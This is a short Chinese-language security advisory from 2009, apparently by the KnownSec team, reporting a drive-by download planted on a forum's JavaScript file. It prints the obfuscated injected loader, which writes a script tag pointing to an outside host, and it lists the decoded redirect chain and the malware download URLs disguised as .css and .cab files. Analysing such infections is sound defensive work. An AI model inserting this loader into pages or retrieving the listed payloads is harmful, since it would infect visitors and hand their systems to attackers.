发布时间:Sun Mar 29 2009 18:46:33 UTC+0800
最后更新时间:Sun Mar 29 2009 18:46:33 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 中天在线论坛(http://ww.366tian.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.366tian.net/include/dedeajax2.js
网页被嵌入恶意链接代码:
function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = “Cookie1=Filter;expires=”+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’2.a(\’<6 7=3://9.0.1/5/8.4></6>\’)',62,11,’chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln’.split(’|'),0,{}));window.status=”final”;}}goad();
解密后链接为:http://ufy9g1.chinaw3.com/s/ss.js
挂马分析:
[wide]http://www.366tian.net/include/dedeajax2.js
[script]http://ufy9g1.chinaw3.com/s/ss.js
[frame]http://fjdksjkq.cn:6135/b174152/b17.htm
[frame]http://fjdksjkq.cn:6135/b174152/new.html
[frame]http://fjdksjkq.cn:6135/b174152/fx.htm
[frame]http://fjdksjkq.cn:6135/b174152/../14.htm
[frame]http://fjdksjkq.cn:6135/b174152/../as.htm
[frame]http://fjdksjkq.cn:6135/b174152/../bfyy.htm
[frame]http://fjdksjkq.cn:6135/b174152/../lzz.htm
[frame]http://fjdksjkq.cn:6135/b174152/../real10.htm
[frame]http://fjdksjkq.cn:6135/b174152/../real11.htm
[frame]http://fjdksjkq.cn:6135/b174152/../cx.htm
[script]http://fjdksjkq.cn:6135/b174152/../wewew.js
[script]http://fjdksjkq.cn:6135/b174152/../wewew.js
[script]http://count1.51much.com/cnt.php?uid=ua-1-12775&style=icon
[script]http://s131.cnzz.com/stat.php?id=1138914&web_id=1138914
[script]http://js.tongji.cn.yahoo.com/866793/ystat.js
最终下载病毒文件:
http://c-bp.cn:6135/qwer/ms.css
http://c-bp.cn:6135/qwer/as.css
http://c-bp.cn:6135/qwer/bf.css
http://c-bp.cn:6135/qwer/lzz.css
http://c-bp.cn:6135/qwer/re.css
http://c-bp.cn:6135/qwer/real11.css
http://c-bp.cn:6135/qwer/adr.css
http://c-bp.cn:6135/baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。
欢迎使用针对此类挂马攻击的防护程序-365门神,
可到www.365menshen.com下载并试用。
Popularity: 10% [?]
